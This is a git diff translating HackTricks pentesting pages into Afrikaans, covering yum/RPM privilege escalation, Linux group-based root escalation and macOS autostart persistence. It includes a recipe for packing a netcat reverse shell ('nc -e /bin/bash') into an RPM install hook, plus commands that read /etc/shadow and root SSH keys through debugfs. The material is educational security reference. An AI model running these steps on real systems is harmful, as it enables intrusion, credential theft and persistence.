-Further examples around yum can also be found on [gtfobins](https://gtfobins.github.io/gtfobins/yum/). +Verdere voorbeelde rondom yum kan ook gevind word op [gtfobins](https://gtfobins.github.io/gtfobins/yum/). -# Executing arbitrary commands via RPM Packages -## Checking the Environment -In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root. +# Uitvoering van willekeurige opdragte via RPM-pakkette +## Kontroleer die omgewing +Om van hierdie vektor gebruik te maak, moet die gebruiker yum-opdragte kan uitvoer as 'n hoërbevoorregte gebruiker, d.w.s. root. -### A working example of this vector -A working example of this exploit can be found in the [daily bugle](https://tryhackme.com/room/dailybugle) room on [tryhackme](https://tryhackme.com). +### 'n Werkende voorbeeld van hierdie vektor +'n Werkende voorbeeld van hierdie uitbuiting kan gevind word in die [daily bugle](https://tryhackme.com/room/dailybugle) kamer op [tryhackme](https://tryhackme.com). -## Packing an RPM -In the following section, I will cover packaging a reverse shell into an RPM using [fpm](https://github.com/jordansissel/fpm). - -The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary. +## Verpak 'n RPM +In die volgende afdeling sal ek verpakking van 'n omgekeerde skulp in 'n RPM dek met behulp van [fpm](https://github.com/jordansissel/fpm). +Die voorbeeld hieronder skep 'n pakkie wat 'n voor-installasie-trigger insluit met 'n willekeurige skrips wat deur die aanvaller gedefinieer kan word. Wanneer dit geïnstalleer word, sal hierdie pakkie die willekeurige opdrag uitvoer. 
Ek het 'n eenvoudige voorbeeld van 'n omgekeerde netcat-skulp gebruik vir demonstrasie, maar dit kan na wense verander word. ```text EXPLOITDIR=$(mktemp -d) CMD='nc -e /bin/bash ' @@ -35,27 +32,24 @@ RPMNAME="exploited" echo $CMD > $EXPLOITDIR/beforeinstall.sh fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR ``` +# Die vang van 'n skulp +Deur die bogenoemde voorbeeld te gebruik en aan te neem dat `yum` uitgevoer kan word as 'n gebruiker met hoër bevoegdhede. -# Catching a shell -Using the above example and assuming `yum` can be executed as a higher-privileged user. - -1. **Transfer** the rpm to the host -2. **Start** a listener on your local host such as the [example netcat listener](/shells/shells/linux#netcat) -3. **Install** the vulnerable package `yum localinstall -y exploited-1.0-1.noarch.rpm` +1. **Oordra** die rpm na die gasheer. +2. **Begin** 'n luisteraar op jou plaaslike gasheer soos die [voorbeeld netcat luisteraar](/shells/shells/linux#netcat). +3. **Installeer** die kwesbare pakkie `yum localinstall -y exploited-1.0-1.noarch.rpm`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md index 5de9f3b73..3dcd8b7f0 100644 --- a/linux-unix/privilege-escalation/interesting-groups-linux-pe.md +++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe.md @@ -1,26 +1,23 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Sudo/Admin Groups +# Sudo/Admin Groepe -## **PE - Method 1** - -**Sometimes**, **by default \(or because some software needs it\)** inside the **/etc/sudoers** file you can find some of these lines: +## **PE - Metode 1** +**Soms**, **standaard \(of omdat sommige sagteware dit nodig het\)** binne die **/etc/sudoers** lêer kan jy van hierdie lyne vind: ```bash # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL 
@@ -28,95 +25,75 @@ Other ways to support HackTricks: # Allow members of group admin to execute any command %admin ALL=(ALL:ALL) ALL ``` +Dit beteken dat **enige gebruiker wat behoort tot die groep sudo of admin enigiets as sudo kan uitvoer**. -This means that **any user that belongs to the group sudo or admin can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +Indien dit die geval is, kan jy **root word deur net die volgende uit te voer**: ```text sudo su ``` +## PE - Metode 2 -## PE - Method 2 - -Find all suid binaries and check if there is the binary **Pkexec**: - +Vind alle suid-binêre en kyk of die binêre **Pkexec** daar is: ```bash find / -perm -4000 2>/dev/null ``` - -If you find that the binary pkexec is a SUID binary and you belong to sudo or admin, you could probably execute binaries as sudo using pkexec. -Check the contents of: - +As jy vind dat die binaêre pkexec 'n SUID-binaêre is en jy behoort aan sudo of admin, kan jy waarskynlik binaêre lêers uitvoer as sudo deur pkexec te gebruik. +Kyk na die inhoud van: ```bash cat /etc/polkit-1/localauthority.conf.d/* ``` +Daar sal jy vind watter groepe toegelaat word om **pkexec** uit te voer en **standaard** in sommige Linux kan sommige van die groepe **sudo of admin** voorkom. -There you will find which groups are allowed to execute **pkexec** and **by default** in some linux can **appear** some of the groups **sudo or admin**. 
- -To **become root you can execute**: - +Om **root te word kan jy uitvoer**: ```bash pkexec "/bin/sh" #You will be prompted for your user password ``` - -If you try to execute **pkexec** and you get this **error**: - +As jy probeer om **pkexec** uit te voer en jy kry hierdie **fout**: ```bash polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie ==== AUTHENTICATION FAILED === Error executing command as another user: Not authorized ``` +**Dit is nie omdat jy nie toestemmings het nie, maar omdat jy nie sonder 'n GUI aangesluit is nie**. En daar is 'n oplossing vir hierdie probleem hier: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). Jy benodig **2 verskillende ssh-sessies**: -**It's not because you don't have permissions but because you aren't connected without a GUI**. And there is a work around for this issue here: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). You need **2 different ssh sessions**: - -{% code title="session1" %} +{% code title="sessie1" %} ```bash echo $$ #Step1: Get current PID pkexec "/bin/bash" #Step 3, execute pkexec #Step 5, if correctly authenticate, you will have a root session ``` -{% endcode %} - -{% code title="session2" %} +{% code title="sessie2" %} ```bash pkttyagent --process #Step 2, attach pkttyagent to session1 #Step 4, you will be asked in this session to authenticate to pkexec ``` {% endcode %} -# Wheel Group - -**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line: +# Wielgroep +**Soms**, **standaard** binne die **/etc/sudoers** lêer kan jy hierdie lyn vind: ```text %wheel ALL=(ALL:ALL) ALL ``` +Dit beteken dat **enige gebruiker wat behoort tot die groep wheel enigiets as sudo kan uitvoer**. 
-This means that **any user that belongs to the group wheel can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +As dit die geval is, kan jy **root word deur net uit te voer**: ```text sudo su ``` +# Skadugroep -# Shadow Group - -Users from the **group shadow** can **read** the **/etc/shadow** file: - +Gebruikers van die **skadugroep** kan die **/etc/shadow**-lêer **lees**: ```text -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow ``` +So, lees die lêer en probeer om **sommige hashe te kraak**. -So, read the file and try to **crack some hashes**. +# Skyf Groep -# Disk Group - - This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. - -Files:`/dev/sd[a-z][1-9]` +Hierdie voorreg is amper **gelykwaardig aan root-toegang** aangesien jy toegang het tot alle data binne-in die masjien. +Lêers: `/dev/sd[a-z][1-9]` ```text debugfs /dev/sda1 debugfs: cd /root 
@@ -124,79 +101,68 @@ debugfs: ls debugfs: cat /root/.ssh/id_rsa debugfs: cat /etc/shadow ``` - -Note that using debugfs you can also **write files**. For example to copy `/tmp/asd1.txt` to `/tmp/asd2.txt` you can do: - +Let daarop dat jy met behulp van debugfs ook **lêers kan skryf**. Byvoorbeeld, om `/tmp/asd1.txt` na `/tmp/asd2.txt` te kopieer, kan jy die volgende doen: ```bash debugfs -w /dev/sda1 debugfs: dump /tmp/asd1.txt /tmp/asd2.txt ``` +Egter, as jy probeer om lêers wat deur root besit word te skryf (soos `/etc/shadow` of `/etc/passwd`), sal jy 'n "Toestemming geweier" fout kry. -However, if you try to **write files owned by root** \(like `/etc/shadow` or `/etc/passwd`\) you will have a "**Permission denied**" error. - -# Video Group - -Using the command `w` you can find **who is logged on the system** and it will show an output like the following one: +# Video Groep +Met die opdrag `w` kan jy **sien wie op die stelsel aangemeld is** en dit sal 'n uitset soos die volgende een toon: ```bash USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT yossi tty1 22:16 5:13m 0.05s 0.04s -bash moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash ``` +Die **tty1** beteken dat die gebruiker **yossi fisies ingeteken** is op 'n terminaal op die masjien. -The **tty1** means that the user **yossi is logged physically** to a terminal on the machine. - -The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to **grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size` - +Die **video groep** het toegang om die skermuitset te sien. Jy kan basies die skerms waarneem. Om dit te doen, moet jy die huidige beeld op die skerm in rou data vasvang en die resolusie kry wat die skerm gebruik. 
Die skerminligting kan gestoor word in `/dev/fb0` en jy kan die resolusie van hierdie skerm vind in `/sys/class/graphics/fb0/virtual_size`. ```bash cat /dev/fb0 > /tmp/screen.raw cat /sys/class/graphics/fb0/virtual_size ``` - -To **open** the **raw image** you can use **GIMP**, select the **`screen.raw`** file and select as file type **Raw image data**: +Om die **rou beeld** oop te maak, kan jy **GIMP** gebruik, kies die **`screen.raw`** lêer en kies as lêertipe **Rou beelddata**: ![](../../.gitbook/assets/image%20%28208%29.png) -Then modify the Width and Height to the ones used on the screen and check different Image Types \(and select the one that shows better the screen\): +Wysig dan die Breedte en Hoogte na die waardes wat op die skerm gebruik word en kyk na verskillende Beeldtipes \(en kies die een wat die skerm beter wys\): ![](../../.gitbook/assets/image%20%28295%29.png) -# Root Group +# Root Groep -It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges... - -**Check which files root members can modify**: +Dit lyk asof **lede van die root groep** standaard toegang kan hê om sekere **dienskonfigurasie-lêers** of sekere **biblioteeklêers** of **ander interessante dinge** te wysig wat gebruik kan word om voorregte te verhoog... +**Kyk watter lêers root-lede kan wysig**: ```bash find / -group root -perm -g=w 2>/dev/null ``` +# Docker Groep -# Docker Group - -You can mount the root filesystem of the host machine to an instance’s volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. +Jy kan die wortel lêerstelsel van die gasheer rekenaar aan 'n instansie se volume koppel, sodat wanneer die instansie begin, dit onmiddellik 'n `chroot` in daardie volume laai. Dit gee jou effektief beheer oor die rekenaar. 
{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} {% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} -# lxc/lxd Group +# lxc/lxd Groep -[lxc - Privilege Escalation](lxd-privilege-escalation.md) +[lxc - Bevoorregte Eskalasie](lxd-privilege-escalation.md)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
- - diff --git a/macos-hardening/macos-auto-start-locations.md b/macos-hardening/macos-auto-start-locations.md index e307ab9de..daf1a82b1 100644 --- a/macos-hardening/macos-auto-start-locations.md +++ b/macos-hardening/macos-auto-start-locations.md @@ -1,230 +1,218 @@ -# macOS Auto Start +# macOS Outomatiese Begin
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-This section is heavily based on the blog series [**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/), the goal is to add **more Autostart Locations** (if possible), indicate **which techniques are still working** nowadays with latest version of macOS (13.4) and to specify the **permissions** needed. +Hierdie afdeling is grootliks gebaseer op die blogreeks [**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/), die doel is om **meer outomatiese beginplekke** (indien moontlik) by te voeg, aan te dui **watter tegnieke steeds werk** met die nuutste weergawe van macOS (13.4) en om die **toestemmings** wat nodig is, te spesifiseer. -## Sandbox Bypass +## Sandbakkie-omseiling {% hint style="success" %} -Here you can find start locations useful for **sandbox bypass** that allows you to simply execute something by **writing it into a file** and **waiting** for a very **common** **action**, a determined **amount of time** or an **action you can usually perform** from inside a sandbox without needing root permissions. +Hier kan jy beginplekke vind wat nuttig is vir **sandbakkie-omseiling** wat jou in staat stel om eenvoudig iets uit te voer deur dit in 'n lêer te **skryf** en te **wag** vir 'n baie **gewone aksie**, 'n bepaalde **tydperk** of 'n **aksie wat jy gewoonlik binne 'n sandbakkie kan uitvoer** sonder om root-toestemmings nodig te hê. 
{% endhint %} ### Launchd -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC Bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig vir sandbakkie-omseiling: [✅](https://emojipedia.org/check-mark-button) +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Locations +#### Plekke * **`/Library/LaunchAgents`** - * **Trigger**: Reboot - * Root required +* **Trigger**: Herlaai +* Root vereis * **`/Library/LaunchDaemons`** - * **Trigger**: Reboot - * Root required +* **Trigger**: Herlaai +* Root vereis * **`/System/Library/LaunchAgents`** - * **Trigger**: Reboot - * Root required +* **Trigger**: Herlaai +* Root vereis * **`/System/Library/LaunchDaemons`** - * **Trigger**: Reboot - * Root required +* **Trigger**: Herlaai +* Root vereis * **`~/Library/LaunchAgents`** - * **Trigger**: Relog-in +* **Trigger**: Herlaai * **`~/Library/LaunchDemons`** - * **Trigger**: Relog-in +* **Trigger**: Herlaai -#### Description & Exploitation +#### Beskrywing & Uitbuiting -**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute** the configurations indicated in the **ASEP** **plists** in: +**`launchd`** is die **eerste** **proses** wat deur die OX S-kernel by opstart uitgevoer word en die laaste een wat by afsluiting klaar is. Dit moet altyd die **PID 1** hê. Hierdie proses sal die konfigurasies wat in die **ASEP** **plists** aangedui word, **lees en uitvoer** in: -* `/Library/LaunchAgents`: Per-user agents installed by the admin -* `/Library/LaunchDaemons`: System-wide daemons installed by the admin -* `/System/Library/LaunchAgents`: Per-user agents provided by Apple. -* `/System/Library/LaunchDaemons`: System-wide daemons provided by Apple. 
+* `/Library/LaunchAgents`: Per-gebruiker-agente wat deur die administrateur geïnstalleer is +* `/Library/LaunchDaemons`: Stelselwye daemons wat deur die administrateur geïnstalleer is +* `/System/Library/LaunchAgents`: Per-gebruiker-agente wat deur Apple voorsien word. +* `/System/Library/LaunchDaemons`: Stelselwye daemons wat deur Apple voorsien word. -When a user logs in the plists located in `/Users/$USER/Library/LaunchAgents` and `/Users/$USER/Library/LaunchDemons` are started with the **logged users permissions**. - -The **main difference between agents and daemons is that agents are loaded when the user logs in and the daemons are loaded at system startup** (as there are services like ssh that needs to be executed before any user access the system). Also agents may use GUI while daemons need to run in the background. +Wanneer 'n gebruiker aanmeld, word die plists wat in `/Users/$USER/Library/LaunchAgents` en `/Users/$USER/Library/LaunchDemons` geleë is, met die **toestemmings van die aangemelde gebruikers** begin. +Die **hoofverskil tussen agente en daemons is dat agente gelaai word wanneer die gebruiker aanmeld en die daemons gelaai word by stelselopstart** (aangesien daar dienste soos ssh is wat uitgevoer moet word voordat enige gebruiker toegang tot die stelsel kry). Agente kan ook GUI gebruik terwyl daemons in die agtergrond moet loop. ```xml - Label - com.apple.someidentifier - ProgramArguments - - bash -c 'touch /tmp/launched' - - RunAtLoad - StartInterval - 800 - KeepAlive - - SuccessfulExit - - +Label +com.apple.someidentifier +ProgramArguments + +bash -c 'touch /tmp/launched' + +RunAtLoad +StartInterval +800 +KeepAlive + +SuccessfulExit + + ``` - -There are cases where an **agent needs to be executed before the user logins**, these are called **PreLoginAgents**. For example, this is useful to provide assistive technology at login. 
They can be found also in `/Library/LaunchAgents`(see [**here**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) an example). +Daar is gevalle waar 'n agent uitgevoer moet word voordat die gebruiker aanmeld, hierdie word genoem **PreLoginAgents**. Byvoorbeeld, dit is nuttig om ondersteunende tegnologie by aanmelding te voorsien. Hulle kan ook gevind word in `/Library/LaunchAgents` (sien [**hier**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) 'n voorbeeld). {% hint style="info" %} -New Daemons or Agents config files will be **loaded after next reboot or using** `launchctl load ` It's **also possible to load .plist files without that extension** with `launchctl -F ` (however those plist files won't be automatically loaded after reboot).\ -It's also possible to **unload** with `launchctl unload ` (the process pointed by it will be terminated), +Nuwe Daemons of Agents konfigurasie lêers sal **gelaai word na die volgende herlaai of deur gebruik te maak van** `launchctl load ` Dit is **ook moontlik om .plist lêers sonder daardie uitbreiding te laai** met `launchctl -F ` (egter sal daardie plist lêers nie outomaties gelaai word na herlaai nie).\ +Dit is ook moontlik om te **ontlaai** met `launchctl unload ` (die proses wat daardeur aangedui word, sal beëindig word), -To **ensure** that there isn't **anything** (like an override) **preventing** an **Agent** or **Daemon** **from** **running** run: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` +Om te **verseker** dat daar nie **iets** (soos 'n oorskrywing) is wat 'n **Agent** of **Daemon** **verhoed** om **uitgevoer** te word nie, voer uit: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` {% endhint %} -List all the agents and daemons loaded by the current user: - +Lys alle die agente en daemons wat deur die huidige gebruiker gelaai is: ```bash launchctl list ``` - {% hint style="warning" %} -If a plist is owned by a user, 
even if it's in a daemon system wide folders, the **task will be executed as the user** and not as root. This can prevent some privilege escalation attacks. +As 'n plist deur 'n gebruiker besit word, selfs as dit in 'n daemon-sisteemwye gids is, sal die taak as die gebruiker uitgevoer word en nie as root nie. Dit kan sommige voorregverhogingsaanvalle voorkom. {% endhint %} -### shell startup files +### skulpaart aanvang lêers Writeup: [https://theevilbit.github.io/beyond/beyond\_0001/](https://theevilbit.github.io/beyond/beyond\_0001/)\ Writeup (xterm): [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC Bypass: [✅](https://emojipedia.org/check-mark-button) - * But you need to find an app with a TCC bypass that executes a shell that loads these files +* Nuttig om sandkas te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC-omseiling: [✅](https://emojipedia.org/check-mark-button) +* Maar jy moet 'n toepassing vind met 'n TCC-omseiling wat 'n skulpaart uitvoer wat hierdie lêers laai -#### Locations +#### Plekke * **`~/.zshrc`, `~/.zlogin`, `~/.zshenv.zwc`**, **`~/.zshenv`, `~/.zprofile`** - * **Trigger**: Open a terminal with zsh +* **Trigger**: Maak 'n terminal oop met zsh * **`/etc/zshenv`, `/etc/zprofile`, `/etc/zshrc`, `/etc/zlogin`** - * **Trigger**: Open a terminal with zsh - * Root required +* **Trigger**: Maak 'n terminal oop met zsh +* Root vereis * **`~/.zlogout`** - * **Trigger**: Exit a terminal with zsh +* **Trigger**: Sluit 'n terminal met zsh * **`/etc/zlogout`** - * **Trigger**: Exit a terminal with zsh - * Root required -* Potentially more in: **`man zsh`** +* **Trigger**: Sluit 'n terminal met zsh +* Root vereis +* Moontlik meer in: **`man zsh`** * **`~/.bashrc`** - * **Trigger**: Open a terminal with bash -* `/etc/profile` (didn't work) -* `~/.profile` (didn't work) +* **Trigger**: Maak 'n terminal oop met 
bash +* `/etc/profile` (het nie gewerk nie) +* `~/.profile` (het nie gewerk nie) * `~/.xinitrc`, `~/.xserverrc`, `/opt/X11/etc/X11/xinit/xinitrc.d/` - * **Trigger**: Expected to trigger with xterm, but it **isn't installed** and even after installed this error is thrown: xterm: `DISPLAY is not set` +* **Trigger**: Verwag om te aktiveer met xterm, maar dit **is nie geïnstalleer nie** en selfs nadat dit geïnstalleer is, word hierdie fout gegooi: xterm: `DISPLAY is not set` -#### Description & Exploitation +#### Beskrywing & Uitbuiting -When initiating a shell environment such as `zsh` or `bash`, **certain startup files are run**. macOS currently uses `/bin/zsh` as the default shell. This shell is automatically accessed when the Terminal application is launched or when a device is accessed via SSH. While `bash` and `sh` are also present in macOS, they need to be explicitly invoked to be used. - -The man page of zsh, which we can read with **`man zsh`** has a long description of the startup files. +Wanneer 'n skulpaart-omgewing soos `zsh` of `bash` geïnisieer word, word **sekere aanvangslêers uitgevoer**. macOS gebruik tans `/bin/zsh` as die verstekskul. Hierdie skul word outomaties geaktiveer wanneer die Terminal-toepassing geopen word of wanneer 'n toestel via SSH benader word. Alhoewel `bash` en `sh` ook teenwoordig is in macOS, moet hulle eksplisiet aangeroep word om gebruik te word. +Die man-bladsy van zsh, wat ons kan lees met **`man zsh`**, het 'n lang beskrywing van die aanvangslêers. ```bash # Example executino via ~/.zshrc echo "touch /tmp/hacktricks" >> ~/.zshrc ``` - -### Re-opened Applications +### Heropende Toepassings {% hint style="danger" %} -Configuring the indicated exploitation and loging-out and loging-in or even rebooting didn't work for me to execute the app. 
(The app wasn't being executed, maybe it needs to be running when these actions are performed) +Die konfigurasie van die aangeduide uitbuiting en uitlog en weer inlog of selfs herlaai het nie vir my gewerk om die toepassing uit te voer nie. (Die toepassing is nie uitgevoer nie, miskien moet dit aan die gang wees wanneer hierdie aksies uitgevoer word) {% endhint %} **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0021/](https://theevilbit.github.io/beyond/beyond\_0021/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandboks te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging * **`~/Library/Preferences/ByHost/com.apple.loginwindow..plist`** - * **Trigger**: Restart reopening applications +* **Trigger**: Herlaai toepassings na heropstart -#### Description & Exploitation +#### Beskrywing & Uitbuiting -All the applications to reopen are inside the plist `~/Library/Preferences/ByHost/com.apple.loginwindow..plist` +Al die toepassings wat heropen moet word, is binne die plist `~/Library/Preferences/ByHost/com.apple.loginwindow..plist` -So, make the reopen applications launch your own one, you just need to **add your app to the list**. +Om dus die heropen toepassings jou eie toepassing te laat uitvoer, hoef jy net jou toepassing by die lys te **voeg**. 
